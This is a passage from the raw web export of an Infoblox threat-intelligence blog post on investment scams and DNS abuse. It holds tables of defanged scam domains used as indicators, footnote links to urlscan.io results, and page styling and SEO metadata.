class=\"code-format\">bortjob[.]pro<br \/>\ntopsmot[.]pro<br \/>\nsitemot[.]pro<br \/>\nviserbik[.]pro<br \/>\ngoaljob[.]pro<br \/>\nsomajob[.]pro<br \/>\nwasakot[.]pro<br \/>\nbrudamot[.]pro<br \/>\ndropbik[.]pro<br \/>\neasyjob[.]pro<br \/>\nkinabik[.]pro\n<\/td>\n<td>Domains used by Ruthless Rabbit in investment scam campaigns<\/td>\n<\/tr>\n<tr>\n<td class=\"code-format\">bitcoineverestai[.]app<br \/>\nbitcoin-eprex[.]com<br \/>\nechelonyieldai[.]app<br \/>\neco-terra[.]app<br \/>\neverix-edge[.]org<br \/>\ngptifexai[.]com<br \/>\nimmediatebitwave[.]app<br \/>\nimmediateluminary[.]com<br \/>\nimmediatemomentum[.]site<br \/>\nquantumflash[.]org<br \/>\nsolidreturn[.]app\n<\/td>\n<td>Sample of domains used by an unnamed actor for investment scams <\/td>\n<\/tr>\n<tr>\n<td class=\"code-format\">vensotixapp-platform[.]store<br \/>\nvasezonixapp[.]guru<br \/>\nvensotixapp[.]click<br \/>\nvenzotexapp[.]cloud<br \/>\naportunex[.]app<br \/>\naportunex-app[.]shop<br \/>\naportunex-app[.]trade<br \/>\naportunex-app[.]wiki<br \/>\naportunexapp[.]top<br \/>\naportunexapp[.]bond<br \/>\naportunexapp[.]help<br \/>\naportunexapp[.]trade<br \/>\naportunexapp[.]wiki<br \/>\nbitcoin-apex[.]guru<br \/>\nbitcoin-apex[.]help<br \/>\nbitcoin-apex[.]website<br \/>\nbitcoinapex-platform[.]click<br \/>\nbitcoinapex-platform[.]guru<br \/>\nbitcoinapex-platform[.]top<br \/>\nbitcoinapex[.]website\n<\/td>\n<td>Sample of RDGA and registered DDGA domains used by an unnamed actor for investment scams<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3 style=\"font-size: 18px;\">Footnotes<\/h3>\n<ol style=\"font-size: 14px;\">\n<li><a href=\"https:\/\/www.ftc.gov\/news-events\/news\/press-releases\/2025\/03\/new-ftc-data-show-big-jump-reported-losses-fraud-125-billion-2024\" target=\"_blank\"><strong>https:\/\/www.ftc.gov\/news-events\/news\/press-releases\/2025\/03\/new-ftc-data-show-big-jump-reported-losses-fraud-125-billion-2024<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/f217e772-6deb-4cbc-88fd-b6b46363494e\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/f217e772-6deb-4cbc-88fd-b6b46363494e<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0195f7b6-1cda-77ce-aadd-22dda511aa0e\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0195f7b6-1cda-77ce-aadd-22dda511aa0e<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/aca53e46-291b-46bd-bc67-76179d82c20a\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/aca53e46-291b-46bd-bc67-76179d82c20a\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0195d87a-5ee5-7228-b6e3-c1968ffc562b\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0195d87a-5ee5-7228-b6e3-c1968ffc562b\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0195ce8b-6b4e-7770-b8d5-cea621d1b835\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0195ce8b-6b4e-7770-b8d5-cea621d1b835\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0195ce8e-3549-700b-addc-64a4879a5ef2\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0195ce8e-3549-700b-addc-64a4879a5ef2\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0195fd9d-9679-736a-8652-99397922991a\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0195fd9d-9679-736a-8652-99397922991a\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/insights.infoblox.com\/resources-research-report\/infoblox-research-report-registered-dgas-the-prolific-new-menace-no-one-is-talking-about\" target=\"_blank\"><strong>https:\/\/insights.infoblox.com\/resources-research-report\/infoblox-research-report-registered-dgas-the-prolific-new-menace-no-one-is-talking-about<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0ba64979-2186-44ed-858e-51f030c9651b\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0ba64979-2186-44ed-858e-51f030c9651b\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/4859f1d7-d337-4f5e-bfb0-e3a8d677a77b\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/4859f1d7-d337-4f5e-bfb0-e3a8d677a77b\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/567a05cb-cae2-4937-a326-2f314c289720\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/567a05cb-cae2-4937-a326-2f314c289720\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/924de331-a6ff-45f7-a4cc-cb13ca93f23f\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/924de331-a6ff-45f7-a4cc-cb13ca93f23f\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/3f999960-0b0f-4cfe-96ae-78cebca95290\/#transactions\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/3f999960-0b0f-4cfe-96ae-78cebca95290\/#transactions<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/responses\/23fb5db0618f6a48381978574a34168554a6ecd14f7d21a1d754d27a8ca4eea8\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/responses\/23fb5db0618f6a48381978574a34168554a6ecd14f7d21a1d754d27a8ca4eea8\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/924de331-a6ff-45f7-a4cc-cb13ca93f23f\/#transactions\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/924de331-a6ff-45f7-a4cc-cb13ca93f23f\/#transactions<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/responses\/7402355aa0d7eb0248bf6fdfb572a43e6457e5c1b26719147464ea224e5009a7\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/responses\/7402355aa0d7eb0248bf6fdfb572a43e6457e5c1b26719147464ea224e5009a7\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/01956c44-fe9a-7113-a0c8-f025f9d4dc9e\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/01956c44-fe9a-7113-a0c8-f025f9d4dc9e<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/01956c44-fe9a-7113-a0c8-f025f9d4dc9e#links\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/01956c44-fe9a-7113-a0c8-f025f9d4dc9e#links<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/019585ef-23c0-7000-bdaf-babc56433b08\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/019585ef-23c0-7000-bdaf-babc56433b08<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/01958f39-aa3e-7001-ab7d-fbe0e3bab026\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/01958f39-aa3e-7001-ab7d-fbe0e3bab026<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/8c5fe52a-e2c3-4300-8a84-320d79e878da\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/8c5fe52a-e2c3-4300-8a84-320d79e878da\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/5c149a21-977b-4cf7-ae02-7095bf8ac54d\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/5c149a21-977b-4cf7-ae02-7095bf8ac54d\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/fe9b35b4-910d-40a5-8edb-e0babdf75740\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/fe9b35b4-910d-40a5-8edb-e0babdf75740\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/f90ad3c0-a347-4272-abba-d4e2357c3cb6\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/f90ad3c0-a347-4272-abba-d4e2357c3cb6\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/f1273504-36df-4db5-9a7f-2532594d0d04\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/f1273504-36df-4db5-9a7f-2532594d0d04\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/responses\/7b3001eef10d518496867654ec76e4f3c6c33550d7a67780ce0440a4c28b5b50\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/responses\/7b3001eef10d518496867654ec76e4f3c6c33550d7a67780ce0440a4c28b5b50\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/85e9ce2c-92f5-48ba-8dfd-ed47d63a9eca\/#redirects\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/85e9ce2c-92f5-48ba-8dfd-ed47d63a9eca\/#redirects<\/strong><\/a><\/li>\n<\/ol>\n<style>\n.savy-seahorse-table {\nfont-size:14px;\nword-break: keep-all;\n}\n.savy-seahorse-table td:last-child, .savy-seahorse-table th:last-child {\npadding-right:10px;\n}\n.code-format {\n\tfont-family: 'Courier New';\n}\n.image-caption {\n    font-size: 12px;\n}\n.list-spacing li{margin-bottom:20px}\n.img-container, .img-container-3-col {\ndisplay: flex;\nflex-wrap: wrap;\njustify-content: space-between;\n}\n.img-container img {\nwidth: 49%;\nmargin-bottom: 10px;\n}\n.img-container-3-col img {\nwidth: 30%;\nmargin-bottom: 10px;\n}\n@media (max-width: 767px) {\n.img-container, .img-container-3-col {\ndisplay: block;\n}\n.img-container img, .img-container-3-col img {\nwidth: 100%;\n}\n.grid-container {\n    grid-template-columns: 1fr!important;\n  }\n}\n@media (min-width: 767px) {\n.img-50{width:50%;}\n}\n.grid-container {\n  display: grid;\n  grid-template-columns: repeat(2, 1fr);\n  gap: 20px;\n  max-width: 800px;\n  margin: 0 auto;\n  padding: 20px;\n  align-items: stretch;\n}\n.grid-item {\n   display: flex;\n  flex-direction: column;\n  justify-content: space-around;\n  padding: 20px;\n}\n.grid-item img {\n  width: 100%;\n  height: auto;\n  border-radius: 8px;\n}\n<\/style>\n<p><script>\njQuery('.single h1').html('Uncovering Actor TTP Patterns and <span class=\"gradient\">the Role of DNS in Investment Scams<\/span>');\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Authors: Darby Wise, Piotr Glaska, Laura da Rocha According to the Federal Trade Commission (FTC), consumers lost more money to investment scams than any other kind in 2024. This equates to a 24 percent increase from 2023 to 2024 in the amount of money lost\u2014a total of US$5.7 billion1. These threats take a variety of [&hellip;]<\/p>\n","protected":false},"author":397,"featured_media":11460,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"_genesis_hide_title":false,"_genesis_hide_breadcrumbs":false,"_genesis_hide_singular_image":false,"_genesis_hide_footer_widgets":false,"_genesis_custom_body_class":"","_genesis_custom_post_class":"","_genesis_layout":"","footnotes":""},"categories":[254],"tags":[893,30,1215,913,40,915,189,930],"class_list":{"0":"post-11459","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-threat-intelligence","8":"tag-domain-name-system","9":"tag-dns","10":"tag-investment-scam","11":"tag-threat-actor","12":"tag-threat-intelligence","13":"tag-rdga","14":"tag-cybersecurity","15":"tag-cybercrime","16":"entry"},"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.3 (Yoast SEO v27.3) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams | Infoblox<\/title>\n<meta name=\"description\" content=\"\u202fDive into the similarities between large-scale investment scams and learn how DNS abuse fuels this billion-dollar industry.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams | Infoblox\" \/>\n<meta property=\"og:description\" content=\"\u202fDive into the similarities between large-scale investment scams and learn how DNS abuse fuels this billion-dollar industry.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/\" \/>\n<meta property=\"og:site_name\" content=\"Infoblox Blog\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-28T18:55:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/blog-thumbnail-investment-scam.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"612\" \/>\n\t<meta property=\"og:image:height\" content=\"408\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Infoblox Threat Intel\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams | Infoblox\" \/>\n<meta name=\"twitter:description\" content=\"\u202fDive into the similarities between large-scale investment scams and learn how DNS abuse fuels this billion-dollar industry.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/blog-thumbnail-investment-scam.jpg\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Infoblox Threat Intel\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"20 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/\"},\"author\":{\"name\":\"Infoblox Threat Intel\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/person\\\/b6aed8965e3298a0817c16d32c0a67ae\"},\"headline\":\"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams\",\"datePublished\":\"2025-04-28T18:55:22+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/\"},\"wordCount\":3674,\"publisher\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/blog-thumbnail-investment-scam.jpg\",\"keywords\":[\"Domain Name System\",\"DNS\",\"investment scam\",\"threat actor\",\"Threat Intelligence\",\"RDGA\",\"Cybersecurity\",\"Cybercrime\"],\"articleSection\":[\"Infoblox Threat Intel\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/\",\"name\":\"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams | Infoblox\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/blog-thumbnail-investment-scam.jpg\",\"datePublished\":\"2025-04-28T18:55:22+00:00\",\"description\":\"\u202fDive into the similarities between large-scale investment scams and learn how DNS abuse fuels this billion-dollar industry.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/blog-thumbnail-investment-scam.jpg\",\"contentUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/blog-thumbnail-investment-scam.jpg\",\"width\":612,\"height\":408,\"caption\":\"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Infoblox Threat Intel\",\"item\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/category\\\/threat-intelligence\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/\",\"name\":\"infoblox.com\\\/blog\\\/\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#organization\",\"name\":\"Infoblox\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/infoblox-logo-2.svg\",\"contentUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/infoblox-logo-2.svg\",\"width\":137,\"height\":30,\"caption\":\"Infoblox\"},\"image\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/person\\\/b6aed8965e3298a0817c16d32c0a67ae\",\"name\":\"Infoblox Threat Intel\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/blogs.infoblox.com\\\/wp-content\\\/uploads\\\/avatar_user_397_1714162589-96x96.png\",\"url\":\"https:\\\/\\\/blogs.infoblox.com\\\/wp-content\\\/uploads\\\/avatar_user_397_1714162589-96x96.png\",\"contentUrl\":\"https:\\\/\\\/blogs.infoblox.com\\\/wp-content\\\/uploads\\\/avatar_user_397_1714162589-96x96.png\",\"caption\":\"Infoblox Threat Intel\"},\"description\":\"Infoblox Threat Intel is the leading creator of original DNS threat intelligence, distinguishing itself in a sea of aggregators. What sets us apart? Two things: mad DNS skills and unparalleled visibility. DNS is notoriously tricky to interpret and hunt from, but our deep understanding and unique access to the internet's inner workings allow us to track down threat actors that others can't see. We're proactive, not just defensive, using our insights to disrupt cybercrime where it begins. We also believe in sharing knowledge to support the broader security community by publishing detailed research and releasing indicators on GitHub. In addition, our intel is seamlessly integrated into our Infoblox Protective DNS solutions, so customers automatically get its benefits, along with ridiculously low false positive rates.\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/author\\\/infoblox-threat-intel\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams | Infoblox","description":"\u202fDive into the similarities between large-scale investment scams and learn how DNS abuse fuels this billion-dollar industry.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/","og_locale":"en_US","og_type":"article","og_title":"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams | Infoblox","og_description":"\u202fDive into the similarities between large-scale investment scams and learn how DNS abuse fuels this billion-dollar industry.","og_url":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/","og_site_name":"Infoblox Blog","article_published_time":"2025-04-28T18:55:22+00:00","og_image":[{"width":612,"height":408,"url":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/blog-thumbnail-investment-scam.jpg","type":"image\/jpeg"}],"author":"Infoblox Threat Intel","twitter_card":"summary_large_image","twitter_title":"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams | Infoblox","twitter_description":"\u202fDive into the similarities between large-scale investment scams and learn how DNS abuse fuels this billion-dollar industry.","twitter_image":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/blog-thumbnail-investment-scam.jpg","twitter_misc":{"Written by":"Infoblox Threat Intel","Est. reading time":"20 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/#article","isPartOf":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/"},"author":{"name":"Infoblox Threat Intel","@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/person\/b6aed8965e3298a0817c16d32c0a67ae"},"headline":"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams","datePublished":"2025-04-28T18:55:22+00:00","mainEntityOfPage":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/"},"wordCount":3674,"publisher":{"@id":"https:\/\/www.infoblox.com\/blog\/#organization"},"image":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/#primaryimage"},"thumbnailUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/blog-thumbnail-investment-scam.jpg","keywords":["Domain Name System","DNS","investment scam","threat actor","Threat Intelligence","RDGA","Cybersecurity","Cybercrime"],"articleSection":["Infoblox Threat Intel"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/","url":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/","name":"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams | Infoblox","isPartOf":{"@id":"https:\/\/www.infoblox.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/#primaryimage"},"image":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/#primaryimage"},"thumbnailUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/blog-thumbnail-investment-scam.jpg","datePublished":"2025-04-28T18:55:22+00:00","description":"\u202fDive into the similarities between large-scale investment scams and learn how DNS abuse fuels this billion-dollar industry.","breadcrumb":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/#primaryimage","url":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/blog-thumbnail-investment-scam.jpg","contentUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/blog-thumbnail-investment-scam.jpg","width":612,"height":408,"caption":"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams"},{"@type":"BreadcrumbList","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.infoblox.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Infoblox Threat Intel","item":"https:\/\/www.infoblox.com\/blog\/category\/threat-intelligence\/"},{"@type":"ListItem","position":3,"name":"Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams"}]},{"@type":"WebSite","@id":"https:\/\/www.infoblox.com\/blog\/#website","url":"https:\/\/www.infoblox.com\/blog\/","name":"infoblox.com\/blog\/","description":"","publisher":{"@id":"https:\/\/www.infoblox.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.infoblox.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.infoblox.com\/blog\/#organization","name":"Infoblox","url":"https:\/\/www.infoblox.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/infoblox-logo-2.svg","contentUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/infoblox-logo-2.svg","width":137,"height":30,"caption":"Infoblox"},"image":{"@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/person\/b6aed8965e3298a0817c16d32c0a67ae","name":"Infoblox Threat Intel","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blogs.infoblox.com\/wp-content\/uploads\/avatar_user_397_1714162589-96x96.png","url":"https:\/\/blogs.infoblox.com\/wp-content\/uploads\/avatar_user_397_1714162589-96x96.png","contentUrl":"https:\/\/blogs.infoblox.com\/wp-content\/uploads\/avatar_user_397_1714162589-96x96.png","caption":"Infoblox Threat Intel"},"description":"Infoblox Threat Intel is the leading creator of original DNS threat intelligence, distinguishing itself in a sea of aggregators. What sets us apart? Two things: mad DNS skills and unparalleled visibility. DNS is notoriously tricky to interpret and hunt from, but our deep understanding and unique access to the internet's inner workings allow us to track down threat actors that others can't see. We're proactive, not just defensive, using our insights to disrupt cybercrime where it begins. We also believe in sharing knowledge to support the broader security community by publishing detailed research and releasing indicators on GitHub. In addition, our intel is seamlessly integrated into our 